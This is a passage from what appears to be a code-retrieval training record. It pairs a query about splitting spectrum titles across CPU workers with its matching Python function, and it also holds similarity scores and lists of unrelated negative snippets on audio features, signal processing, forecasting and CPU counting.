set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]",
"def calculate_mixture_features(args):\n workspace = args.workspace\n speech_dir = args.speech_dir\n noise_dir = args.noise_dir\n data_type = args.data_type\n fs = cfg.sample_rate\n dir_name = args.dir_name\n\n fid_clean = open(speech_dir, 'r')\n lines_clean = fid_clean.readlines()\n fid_clean.close()\n\n fid_reverb = open(noise_dir, 'r')\n lines_reverb = fid_reverb.readlines()\n fid_reverb.close()\n\n for files_clean, files_reverb in zip(lines_clean, lines_reverb):\n\n files_clean = files_clean.strip('\\n')\n files_reverb = files_reverb.strip('\\n')\n\n fid = open(files_clean,'r')\n wavLines_clean = fid.readlines()\n fid.close()\n fid = open(files_reverb,'r')\n wavLines_reverb = fid.readlines()\n fid.close()\n\n cnt = 0 \n\n for wavs_clean, wavs_reverb in zip(wavLines_clean, wavLines_reverb):\n \n t1 = time.time()\n # cnt = 0\n\n wav_name_clean, wav_path_clean = wavs_clean.split()\n wav_name_reverb, wav_path_reverb = wavs_reverb.split()\n \n # Read clean speech audio. \n (speech_audio, _) = read_audio(wav_path_clean, target_fs=fs)\n \n # Read reverb speech audio. \n (noise_audio, _) = read_audio(wav_path_reverb, target_fs=fs)\n \n # Cut reverb speech to the same length as clean speech. \n if len(noise_audio) > len(speech_audio):\n noise_audio = noise_audio[0: len(speech_audio)]\n \n # Extract spectrogram. \n mixed_complx_x = calc_sp(noise_audio, mode='complex')\n speech_x = calc_sp(speech_audio, mode='magnitude')\n\n # Write out features. \n out_feat_path = os.path.join(workspace, \"features\", \"spectrogram\", \n data_type, dir_name, \"%s.p\" % wav_name_reverb)\n create_folder(os.path.dirname(out_feat_path))\n data = [mixed_complx_x, speech_x, wav_name_reverb]\n pickle.dump(data, open(out_feat_path, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n \n # Print. \n if cnt % 100 == 0:\n print(cnt)\n # print(mixed_complx_x)\n # print(speech_x)\n \n cnt += 1\n\n print(\"Extracting feature time: %s\" % (time.time() - t1))",
"def main():\n\n pathfolder = \"/home/vanessa/DATA_SEEG/PKL_FILE/\"\n filename = \"/data.pkl\"\n # pathfolder = argv[1]\n # filename = argv[2]\n\n ti = 10. # initial time\n tf = 590. # final time\n t_split = 300. # split\n fs = 1000. # sampling frequency\n powerline = 50.\n\n thresholds = np.load(\"threshold.npy\") # load the threshold file\n meanthresh = thresholds.mean(axis=0)[1::2]\n stdthresh = thresholds.std(axis=0)[1::2]\n\n # features = 159 # classification features + (x,y,z)-coordinates\n\n for ii, id in enumerate(os.listdir(pathfolder)):\n\n print(id)\n\n df = pd.read_pickle(pathfolder + id + filename)\n\n validchannels = np.where(~df.loc[:, \"PTD\"].isnull())[0] # remove NaN values\n\n df = df.iloc[validchannels, :]\n _, p = df.shape\n\n timeseries = df.values[:, :-5] # we are not considering Y, ptd, coordinates\n\n data = remove_powerline(timeseries, fs) # remove power line effects\n\n #################### split into 2 fragments ############################\n\n split1half = data[:, int(fs*ti):int(fs*t_split)]\n split2half = data[:, int(fs*t_split):int(fs*tf)]\n\n timefeat1half = merge_temporal_features(split1half, fs, powerline,\n meanthresh)\n timefeat2half = merge_temporal_features(split2half, fs, powerline,\n meanthresh)\n\n ########################################################################\n\n cc = [df.index[t] for t in range(len(df.index))]\n arrays = [[id]*(2*len(df.index)), cc + cc]\n\n tuples = list(zip(*arrays))\n index = pd.MultiIndex.from_tuples(tuples, names=['patient', 'channel'])\n\n # temporal features from SEEG\n timefeatdf = pd.DataFrame(data=np.vstack((timefeat1half,\n timefeat2half)), index=index)\n\n # spatial features for MRI\n spacefeat = df.values[:, -4:]\n spacefeatdf = pd.DataFrame(data=np.vstack((spacefeat, spacefeat)),\n index=index, columns=\n ['PTD', 'xcoor', 'ycoor', 'zcoor'])\n\n # y labels\n ylab = df.values[:, -5]\n Ylabel = pd.DataFrame(data=np.append(ylab, ylab), index=index,\n columns=[\"Y\"])\n\n # pickle file in output\n outputpkl = pd.concat([timefeatdf, spacefeatdf, Ylabel], axis=1)\n\n outputpkl.to_pickle(pathfolder + id + \"/features.pkl\")\n\n if ii == 0:\n ddd = outputpkl\n else:\n ddd = pd.concat([ddd, outputpkl], axis=0)\n\n ddd.to_pickle(pathfolder + \"classificationset.pkl\")",
"def extract_training_data(qrel_dict, pipeline, n_cores=-1, cache_path='doc_cache', verbose=True):\n # query-document pairs\n qd_pairs = qrel_dict['qd_pairs']\n\n # all document ids this set refers to\n trec_ids = qrel_dict['trec_ids']\n trec_to_doc_dict = None\n if pipeline is not None:\n # print('### Retrieving documents ###')\n # a dict that houses a Document for each id, read from the cache\n # trec_to_doc_dict = retrieve_docs_from_cache(trec_ids, cache_path=cache_path,verbose=verbose,n_cores=n_cores)\n print('### Extracting features ###')\n # single process\n if n_cores is 1:\n total = extract_training_dataframe(qd_pairs,pipeline,cache_path=cache_path,verbose=verbose)\n # multiple processes\n else:\n # if the number is unspecified\n if n_cores is -1:\n # one process per core\n n_cores = multiprocessing.cpu_count()\n\n pool = multiprocessing.Pool(processes=n_cores)\n\n # split into a list of lists, one per process\n chunked_key_lists = chunk_list(list(qd_pairs.keys()), n_cores)\n # chunked: each chunk is a subdictionary (i.e. a number of qd pairs)\n chunked = []\n\n # make a dict of lists, one list per core\n temp = [(i,[]) for i in range(n_cores)]\n doc_set_dict = dict(temp)\n\n for i, key_list in enumerate(chunked_key_lists):\n temp = {}\n for key in key_list:\n # get the qd_pair at this key\n pair = qd_pairs[key]\n # all the docs needed by this query\n docs = list(pair['rels'].keys())\n # look at the doc_set_dict, check whether there'd be overlap\n doc_set_dict[i].append(docs)\n temp[key] = qd_pairs[key]\n\n chunked.append(temp)\n\n doc_set_dict_flat = {}\n # flatten each of the sublists to get an overview of all the docs needed\n for core_key in doc_set_dict.keys():\n list_of_lists = doc_set_dict[core_key]\n doc_set_dict_flat[core_key] = list(itertools.chain(*list_of_lists))\n\n # generate all combinations of cores\n core_keys = list(doc_set_dict.keys())\n for pair in itertools.combinations(core_keys,2):\n # check if there is any overlap between the two\n docs_0 = doc_set_dict_flat[pair[0]]\n docs_1 = doc_set_dict_flat[pair[1]]\n print(pair)\n overlap = [id for id in docs_0 if id in docs_1]\n print(len(overlap))\n\n\n # use the partial functool here: this allows us to keep some paramters fixed\n # the multiprocessing logic will thus only operate on the first parameter,\n # passing different chunks to the extraction function\n\n # we get a list of dataframes that house X, y, ids (one for each process)\n pool_outputs = pool.map(partial(extract_training_dataframe, pipeline=pipeline,\n cache_path=cache_path, verbose=verbose),\n chunked)\n\n # concat all the frames into a single one\n total = pd.concat(pool_outputs)\n\n # get rid of the pool\n pool.close()\n pool.join()\n\n return total",
"def run_xrfi(\n *,\n method: str,\n spectrum: np.ndarray,\n freq: np.ndarray,\n weights: Optional[np.ndarray] = None,\n flags: Optional[np.ndarray] = None,\n n_threads: int = cpu_count(),\n fl_id=None,\n **kwargs,\n) -> np.ndarray:\n rfi = getattr(xrfi, f\"xrfi_{method}\")\n\n if weights is None:\n if flags is None:\n weights = np.ones_like(spectrum)\n else:\n weights = (~flags).astype(float)\n\n if flags is not None:\n weights = np.where(flags, 0, weights)\n\n if spectrum.ndim in rfi.ndim:\n flags = rfi(spectrum, weights=weights, **kwargs)[0]\n elif spectrum.ndim > max(rfi.ndim) + 1:\n # say we have a 3-dimensional spectrum but can only do 1D in the method.\n # then we collapse to 2D and recursively run xrfi_pipe. That will trigger\n # the *next* clause, which will do parallel mapping over the first axis.\n orig_shape = spectrum.shape\n new_shape = (-1,) + orig_shape[2:]\n flags = run_xrfi(\n spectrum=spectrum.reshape(new_shape),\n weights=weights.reshape(new_shape),\n freq=freq,\n method=method,\n n_threads=n_threads,\n **kwargs,\n )\n return flags.reshape(orig_shape)\n else:\n n_threads = min(n_threads, len(spectrum))\n\n # Use a parallel map unless this function itself is being called by a\n # parallel map.\n wrns = defaultdict(lambda: 0)\n\n def count_warnings(message, *args, **kwargs):\n wrns[str(message)] += 1\n\n old = warnings.showwarning\n warnings.showwarning = count_warnings\n\n if current_process().name == \"MainProcess\" and n_threads > 1:\n\n def fnc(i):\n # Gets the spectrum/weights from the global var dict, which was\n # initialized by the pool.\n # See https://research.wmz.ninja/articles/2018/03/on-sharing-large-\n # arrays-when-using-pythons-multiprocessing.html\n spec = np.frombuffer(_globals[\"spectrum\"]).reshape(_globals[\"shape\"])[i]\n wght = np.frombuffer(_globals[\"weights\"]).reshape(_globals[\"shape\"])[i]\n\n if np.any(wght > 0):\n return rfi(spec, freq=freq, weights=wght, **kwargs)[0]\n else:\n return np.ones_like(spec, dtype=bool)\n\n shared_spectrum = RawArray(\"d\", spectrum.size)\n shared_weights = RawArray(\"d\", spectrum.size)\n\n # Wrap X as an numpy array so we can easily manipulates its data.\n shared_spectrum_np = np.frombuffer(shared_spectrum).reshape(spectrum.shape)\n shared_weights_np = np.frombuffer(shared_weights).reshape(spectrum.shape)\n\n # Copy data to our shared array.\n np.copyto(shared_spectrum_np, spectrum)\n np.copyto(shared_weights_np, weights)\n\n p = Pool(\n n_threads,\n initializer=_init_worker,\n initargs=(shared_spectrum, shared_weights, spectrum.shape),\n )\n m = p.map\n else:\n\n def fnc(i):\n if np.any(weights[i] > 0):\n return rfi(spectrum[i], freq=freq, weights=weights[i], **kwargs)[0]\n else:\n return np.ones_like(spectrum[i], dtype=bool)\n\n m = map\n\n results = m(fnc, range(len(spectrum)))\n flags = np.array(list(results))\n\n warnings.showwarning = old\n\n # clear global memory (not sure if it still exists)\n _init_worker(0, 0, 0)\n\n fl_id = f\"{fl_id}: \" if fl_id else \"\"\n\n if wrns:\n for msg, count in wrns.items():\n msg = msg.replace(\"\\n\", \" \")\n logger.warning(\n f\"{fl_id}Received warning '{msg}' {count}/{len(flags)} times.\"\n )\n\n return flags",
"def Run_Extraction(self):\n\n # print the summary of the model\n print(self.ww_model.model.summary(), end=\"\\n\\n\", flush=True)\n # open an audio data stream\n self.stream = self.p.open(format=self.format, channels=self.channels,\n rate=self.rate, input=True,\n frames_per_buffer=self.chunk)\n\n act_count = 0\n\n while True:\n\n # reads chunk of audio\n data = self.stream.read(self.chunk)\n\n # appends chunk to frame list\n self.frames.append(data)\n\n # begins making predictions after the first\n # 2.5 seconds of audio is read\n if (len(self.frames) > 19):\n\n prediction = self.Prediction()\n\n # if the predictions is larger than the defined confidence\n if (prediction > self.confidence):\n\n # increment the activation counter\n act_count += 1\n\n # if the number of consecutive activations\n # exceeds the activation value\n if(act_count >= self.activations):\n\n # print out \"nimbus\"\n print(\" << nimbus >> \", end=\" \", flush=True)\n\n # reset activation count\n act_count = 0\n\n self.False_Activation()\n\n self.frames = self.frames[18:]\n\n if (self.false_counts >= self.false_count):\n self.Retrain_Model()\n\n # if prediction falls below the confidence level\n else:\n\n # reset the activation count\n act_count = 0\n\n if not(self.print_pred):\n # output nothing to the stream\n print(\"-\", end=\"\", flush=True)\n\n # window the data stream\n self.frames = self.frames[1:]",
"def demo_train(ts_struct_list, frc_model=None, fg_mdl=None, fs_mdl=None, verbose=False,\n return_model=False, rewrite=True):\n\n # Check arguments:\n if fg_mdl is None:\n fg_mdl = frc_class.IdentityGenerator(name=\"Identity generator\", on=False)\n\n if fs_mdl is None:\n fs_mdl = gnt_class.FeatureGeneration() # IdentityModel(name=\"Identity selector\")\n\n if frc_model is None:\n frc_model = frc_class.CustomModel(Lasso, name=\"Lasso\", alpha=0.01)\n\n model = frc_class.PipelineModel(gen_mdl=fg_mdl, sel_mdl=fs_mdl, frc_mdl=frc_model)\n results = []\n res_text = []\n\n for ts in ts_struct_list:\n data = regression_matrix.RegMatrix(ts, x_idx=TS_IDX, y_idx=TS_IDX)\n\n # Create regression matrix\n data.create_matrix(nsteps=N_STEPS, norm_flag=True) # this creates data.Y, data.X and some other fields\n\n # Split data for training and testing\n data.train_test_split(TRAIN_TEST_RATIO)\n\n # train the model. This returns trained pipeline and its steps\n model, frc, gen, sel = model.train_model(data.trainX, data.trainY)\n\n selection_res = \"\\n Feature selection results: problem status {}, selected {} from {} \\\\\\\\ \\n\".\\\n format(sel.status, len(sel.selected), sel.n_vars)\n\n frcY, _ = data.forecast(model) # returns forecasted matrix of the same shape as data.Y\n # frcY, idx_frc = data.forecast(model, idx_rows=data.idx_test) # this would return forecasts only for data.testY\n\n data.plot_frc(n_frc=5, n_hist=10, folder=SAVE_DIR) #this saves figures into SAVE_DIR\n\n train_mae = data.mae(idx_rows=data.idx_train, idx_original=data.original_index)\n train_mape = data.mape(idx_rows=data.idx_train, idx_original=data.original_index)\n\n test_mae = data.mae(idx_rows=data.idx_test, idx_original=data.original_index)\n test_mape = data.mape(idx_rows=data.idx_test, idx_original=data.original_index)\n\n index = [ts.data[i].name for i in TS_IDX]\n res1 = pd.DataFrame(train_mae, index=index, columns=[(\"MAE\", \"train\")])\n res2 = pd.DataFrame(train_mape, index=index, columns=[(\"MAPE\", \"train\")])\n res3 = pd.DataFrame(test_mae, index=index, columns=[(\"MAE\", \"test\")])\n res4 = pd.DataFrame(test_mape, index=index, columns=[(\"MAPE\", \"test\")])\n res = pd.concat([res1, res2, res3, res4], axis=1)\n\n configuration_str = \"\\n Time series {} forecasted with {} + '{}' feature generation model and \" \\\n \"'{}' feature selection model \\\\\\\\ \\n\".format(ts.name, frc.name, gen.name, sel.name)\n if verbose:\n print(configuration_str)\n print(selection_res)\n print(res)\n\n results.append(res)\n res_text.append(configuration_str)\n res_text.append(selection_res)\n\n saved_mdl_fname = model.save_model(file_name=FNAME_PREFIX, folder=SAVE_DIR) # saving in not an option yet\n # model = frc_class.PipelineModel().load_model(file_name=fname)\n\n # write results into a latex file\n my_plots.save_to_latex(results, df_names=res_text, folder=SAVE_DIR, rewrite=rewrite)\n print(\"Results saved to folder {}\".format(SAVE_DIR))\n\n if return_model:\n return model, saved_mdl_fname\n\n return saved_mdl_fname",
"def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)",
"def pre_process(self):\n t1_start = perf_counter()\n wav_arr_raw = np.array(self.raw_data['spectrum_0'].attrs['wavelengths'])\n self.wavelengths = wav_arr_raw\n self.back_spectra_arr = np.array(self.raw_data['spectrum_0'].attrs['background'])\n\n corr_data = []\n times_proc = []\n\n # extract reference point for 0 seconds\n time_ref = str(self.raw_data['spectrum_0'].attrs['creation_timestamp'])\n\n # spectrometer adds 'b' and quotation marks to timestamps that must be removed\n # some spectra are taken on X.000000s which does not have a .%f component - use try and except\n try:\n time_ref = datetime.strptime((time_ref.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S.%f\")\n except ValueError:\n time_ref = datetime.strptime((time_ref.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S\")\n\n print('Measurement was started at {}, \\n normalising times and applying a background correction \\n'.format(time_ref))\n\n # applies background correction\n for counter, spectra in enumerate(self.raw_data.keys()):\n corr_data.append(self.raw_data[spectra]-self.back_spectra_arr)\n time = str(self.raw_data[spectra].attrs['creation_timestamp'])\n try:\n time = datetime.strptime((time.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S.%f\")\n except ValueError:\n time = datetime.strptime((time.replace('b','')).replace('\\'',''),\"%Y-%m-%dT%H:%M:%S\")\n deltatime = time - time_ref\n times_proc.append(deltatime.total_seconds())\n\n self.times = np.array(times_proc)\n print('Measurement contains {} spectra with {} wavelengths \\n'.format(len(self.times),len(self.wavelengths)))\n\n # data is stored as a pd Dataframe with elapsed times as indices and wavelengths as columns\n pre_proc_data = pd.DataFrame(corr_data, index = self.times, columns = self.wavelengths)\n\n # data may be disordered in time when iterated through\n # sort the data by elapsed time\n self.pre_proc_data = pre_proc_data.sort_index(axis=0)\n self.times = np.sort(self.times)\n\n t1_stop = perf_counter()\n print(\"Elapsed time for pre-processing:\", t1_stop-t1_start)\n\n return self.pre_proc_data"
] |
[
"0.6365543",
"0.6278067",
"0.61542547",
"0.5983721",
"0.5951358",
"0.59303653",
"0.5856723",
"0.5846219",
"0.58419764",
"0.5743628",
"0.56974417",
"0.56961113",
"0.56395173",
"0.56236494",
"0.5586922",
"0.5574862",
"0.556438",
"0.55371463",
"0.55307126",
"0.55262214",
"0.5522019",
"0.5516359",
"0.5497918",
"0.5481034",
"0.5458032",
"0.5411737",
"0.54013675",
"0.53916466",
"0.53893816",
"0.5365748"
] |
0.7796184
|
0
|
Take a list and return a list containing num_cpu smaller lists with the spectrum titles/peptides that will be split across the workers
|
def prepare_titles(titles, num_cpu):
# titles might be ordered from small to large peptides,
# shuffling improves parallel speeds
shuffle(titles)
split_titles = [
titles[i * len(titles) // num_cpu : (i + 1) * len(titles) // num_cpu]
for i in range(num_cpu)
]
logger.debug(
"{} spectra (~{:.0f} per cpu)".format(
len(titles), np.mean([len(a) for a in split_titles])
)
)
return split_titles
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_cpus():\n online_cpus = osutil.get_online_cpus()\n offline_cpus = POSSIBLE_CPUS - online_cpus\n print(\"Online: CPU \", shorten_cores(online_cpus))\n print(\"Offline: CPU \", shorten_cores(offline_cpus))",
"def cpu_online_map():\r\n cpuinfo = get_cpuinfo()\r\n cpus = []\r\n for cpu in cpuinfo:\r\n cpus.append(cpu['processor']) # grab cpu number\r\n return cpus",
"def available_cpu_list():\n \n def expand(s):\n if s.count(\"-\") == 1:\n numbers = re.findall(r'(\\d+)', s)\n start = int(numbers[0])\n end = int(numbers[1])\n return list(range(start, end+1))\n \n elif s.count(\"-\") == 0:\n return [int(s)]\n else:\n print(\"The string cannot have more than one dash mark (-).\")\n\n # cpuset\n # cpuset may restrict the number of *available* processors\n try:\n m = re.search(r'(?m)^Cpus_allowed_list:\\s*(.*)$',\n open('/proc/self/status').read())\n if m:\n group = m.group(1)\n # group=\"0-7,9-10, 14\"\n \n m = re.findall(r'(\\d+(-\\d+)?)', group)\n items = [item[0] for item in m]\n \n cpus = []\n for item in items:\n cpus += expand(item)\n \n return cpus\n except IOError:\n raise IOError(\"Could not read /proc/self/status\")",
"def get_cpus():\n\n # Get the list of offline CPU cores\n offline_cpus = subprocess.check_output(\n \"lscpu | grep '^Off-line CPU(s) list:' | awk -F: '{print $2}'\",\n shell=True\n ).strip().decode()\n\n # Get the number of total CPU cores\n total_cpus = subprocess.check_output(\n \"lscpu | grep '^CPU(s):' | awk '{print $2}'\",\n shell=True\n ).strip().decode()\n\n return total_cpus, offline_cpus",
"def cpus(self):\n return self.__cpus",
"def number_of_workers():\n return (cpu_count() * 2) + 1",
"def _GetThreadsQpsPerLoaderList():\n\n def _FormatThreadQps(thread_qps):\n thread_qps_pair = thread_qps.split(':')\n if len(thread_qps_pair) == 1:\n thread_qps_pair.append(0)\n return [int(val) for val in thread_qps_pair]\n\n return [\n _FormatThreadQps(thread_qps)\n for thread_qps in FLAGS.ycsb_threads_per_client\n ]",
"def compute_cores(config):\n cores = config.getint('General','cores')\n if cores > mp.cpu_count():\n cores = mp.cpu_count()\n return cores",
"def number_of_workers():\n return (multiprocessing.cpu_count() * 2) + 1",
"def calculate_cpu_parameters(self):\n\n # Calculate the cpu parameters, needed for the\n # vpp_startup and grub configuration\n for i in self._nodes.items():\n node = i[1]\n\n # get total number of nic ports\n interfaces = node[\"interfaces\"]\n\n # Make a list of ports by numa node\n ports_per_numa = self._create_ports_per_numa(node, interfaces)\n\n # Get the number of cpus to skip, we never use the first cpu\n other_cpus_start = 1\n other_cpus_end = other_cpus_start + node[\"cpu\"][\"total_other_cpus\"] - 1\n other_workers = None\n if other_cpus_end != 0:\n other_workers = (other_cpus_start, other_cpus_end)\n node[\"cpu\"][\"other_workers\"] = other_workers\n\n # Allocate the VPP main core and workers\n vpp_workers = []\n reserve_vpp_main_core = node[\"cpu\"][\"reserve_vpp_main_core\"]\n total_vpp_cpus = node[\"cpu\"][\"total_vpp_cpus\"]\n total_rx_queues = node[\"cpu\"][\"total_rx_queues\"]\n\n # If total_vpp_cpus is 0 or is less than the numa nodes with ports\n # then we shouldn't get workers\n total_workers_node = 0\n if len(ports_per_numa):\n total_workers_node = total_vpp_cpus // len(ports_per_numa)\n total_main = 0\n if reserve_vpp_main_core:\n total_main = 1\n total_mbufs = 0\n if total_main + total_workers_node != 0:\n for item in ports_per_numa.items():\n numa_node = item[0]\n value = item[1]\n\n # Get the number of descriptors and queues\n mbufs = self._calc_desc_and_queues(\n len(ports_per_numa),\n len(value[\"interfaces\"]),\n total_rx_queues,\n value,\n )\n total_mbufs += mbufs\n\n # Get the VPP workers\n reserve_vpp_main_core = self._calc_vpp_workers(\n node,\n vpp_workers,\n numa_node,\n other_cpus_end,\n total_workers_node,\n reserve_vpp_main_core,\n )\n\n total_mbufs *= 2.5\n total_mbufs = int(total_mbufs)\n else:\n total_mbufs = 0\n\n # Save the info\n node[\"cpu\"][\"vpp_workers\"] = vpp_workers\n node[\"cpu\"][\"total_mbufs\"] = total_mbufs\n\n # Write the config\n self.updateconfig()",
"def determine_jobs_per_pool(numpools, totaljobs):\n cluster = os.environ['CC_CLUSTER']\n if cluster in ['graham', 'beluga']:\n jobs_per_pool = math.floor(totaljobs / numpools)\n else:\n jobs_per_pool = totaljobs\n return jobs_per_pool",
"def ncpu ( events ) :\n #\n n_cores = numcpu() \n if n_cores <= 1 : return ROOT.RooFit.NumCPU ( 1 ) ## fake!!! \n #\n n = events // _nemax\n if n <= 1 : return ROOT.RooFit.NumCPU ( 1 ) ## fake!!! \n #\n num = min ( n , n_cores , _ncmax )\n if not _ncpus : _ncpus.append ( num ) \n #\n return ROOT.RooFit.NumCPU ( num )",
"def compute_workload(num_cores, num_flows, spread):\r\n # sigma is the sum of the normalized processing velocity scores\r\n # for each cluster processor. In a perfect world, sigma == num_cores\r\n # and the normalized processing velocity (in spread) == 1.0\r\n\r\n sigma = fsum(spread[0:num_cores])\r\n workload = [trunc((num_flows * x / sigma))for x in spread[0:num_cores]]\r\n\r\n while sum(workload) < num_flows:\r\n finish = workload[0] / spread[0]\r\n i = 0\r\n for x in range(1, num_cores):\r\n t = workload[x] / spread[x]\r\n if t < finish:\r\n finish = t\r\n i = x\r\n workload[i] += 1\r\n return workload",
"def get_cpuvals(inteval = 1):\n cpu_array = psutil.cpu_percent(inteval, percpu=True)\n return {\n 'CPUCore1': cpu_array[0],\n 'CPUCore2': cpu_array[1],\n 'CPUCore3': cpu_array[2],\n 'CPUCore4': cpu_array[3],\n 'CPU': sum(cpu_array)/4\n }",
"def get_cores(sockets):\n cores = []\n for skt in sockets:\n cores.extend(SOCKET_DICT[skt])\n\n return cores",
"def make_slices(big_scriptlist):\n num_cores = multiprocessing.cpu_count()\n list_of_scriptlists = [] # This will be our output.\n incrementlist = range(0,len(big_scriptlist),num_cores) # How we increment.\n for i in incrementlist:\n list_of_scriptlists.append(big_scriptlist[i:i+num_cores])\n return list_of_scriptlists",
"def get_overall_cpu_util(dut, exclude_proc_name=None):",
"def sub_processor(lock, pid, video_list):\r\n text = 'processor %d' % pid\r\n with lock:\r\n progress = tqdm.tqdm(\r\n total=len(video_list),\r\n position=pid,\r\n desc=text\r\n )\r\n for i in range(len(video_list)):\r\n video_name = video_list[i]\r\n \"\"\" Read result csv file \"\"\"\r\n df = pd.read_csv(os.path.join(config.post_csv_load_dir, video_name + \".csv\"))\r\n \"\"\" Calculate final score of proposals \"\"\"\r\n df['score'] = df.iou.values[:] * df.start.values[:] * df.end.values[:]\r\n if len(df) > 1:\r\n df = softNMS(df)\r\n df = df.sort_values(by=\"score\", ascending=False)\r\n video_info = video_dict[video_name]\r\n video_duration = video_info[\"duration_second\"]\r\n proposal_list = []\r\n\r\n for j in range(min(top_number, len(df))):\r\n tmp_proposal = {}\r\n tmp_proposal[\"score\"] = df.score.values[j]\r\n tmp_proposal[\"segment\"] = [max(0, df.xmin.values[j]) * video_duration,\r\n min(1, df.xmax.values[j]) * video_duration]\r\n tmp_proposal[\"label\"] = \"行走\"\r\n # tmp_proposal[\"label\"] = \"Fun sliding down\"\r\n proposal_list.append(tmp_proposal)\r\n result_dict[video_name] = proposal_list\r\n with lock:\r\n progress.update(1)\r\n\r\n with lock:\r\n progress.close()",
"def eval_cpuset():\n\tnum_cpu = run('grep -c ^processor /proc/cpuinfo',quiet=True,warn_only=True)\n\tprint(red('Number of cpus : \\t'+num_cpu))",
"def per_cpu_times():\n ret = []\n for user, system, idle, interrupt, dpc in cext.per_cpu_times():\n item = scputimes(user, system, idle, interrupt, dpc)\n ret.append(item)\n return ret",
"def cpu_count():\n num_available_cores = multiprocessing.cpu_count()\n return num_available_cores",
"def getASDistributionbyCpu(num_as,node_files):\n node_list = []\n num_cpus = 0\n for n in node_files:\n with open(n) as nfd:\n dati = json.load(nfd)\n obj = {}\n obj['name'] = n.split(\"/\", 1)[1]\n obj['cpus'] = dati['ansible_facts']['ansible_processor_vcpus']\n obj['as_list'] = []\n node_list.append(obj)\n num_cpus += obj['cpus']\n\n as_per_cpu = num_as / num_cpus\n as_list = []\n if as_per_cpu < 1:\n as_per_cpu = 1\n print(num_cpus)\n print(as_per_cpu)\n # Deploy an even number of ases on the nodes\n as_to_deploy = 1\n for n in node_list:\n for i in range(0,n['cpus']):\n for j in range(0,int(as_per_cpu)):\n if as_to_deploy <= num_as:\n n['as_list'].append(as_to_deploy)\n as_list.append({'as':as_to_deploy, 'node':n['name']})\n as_to_deploy += 1\n\n # Now the nodes are evenly loaded, if we still have something to place, just put it\n # one per core\n if as_to_deploy < num_as:\n for n in node_list:\n for i in range(0,n['cpus']):\n if as_to_deploy <= num_as:\n n['as_list'].append(as_to_deploy)\n as_list.append({'as':as_to_deploy, 'node':n['name']})\n as_to_deploy += 1\n\n return(node_list,as_list)",
"def get_ncpu():\n from multiprocessing import cpu_count\n return cpu_count()",
"def cpu_count_cores():\n return cext.cpu_count_cores()",
"def calculatePixelMetricsMP(input_img, input_df, num_workers=8):\n\n manager = Manager()\n new_cir = manager.list()\n q = Queue()\n for index, row in input_df.iterrows():\n plot = row['plot']\n x = row['x']\n y = row['y']\n r = row['r']\n weight = row['weight']\n info = [plot, x, y, r, weight]\n q.put(info)\n workers = Pool(num_workers, calculatePixelMetricsQueue,(q, input_img, input_df, new_cir))\n workers.close()\n workers.join()\n \n header = ['plot', 'x', 'y', 'r', 'weight', 'core', 'inner', 'outer']\n print(len(new_cir))\n output_df = pd.DataFrame(list(new_cir), columns=header)\n return output_df",
"def workers_per_encoding(self):\n # type: () -> int\n return self._workers_per_encoding",
"def get_total_n_cpu(self) -> int:",
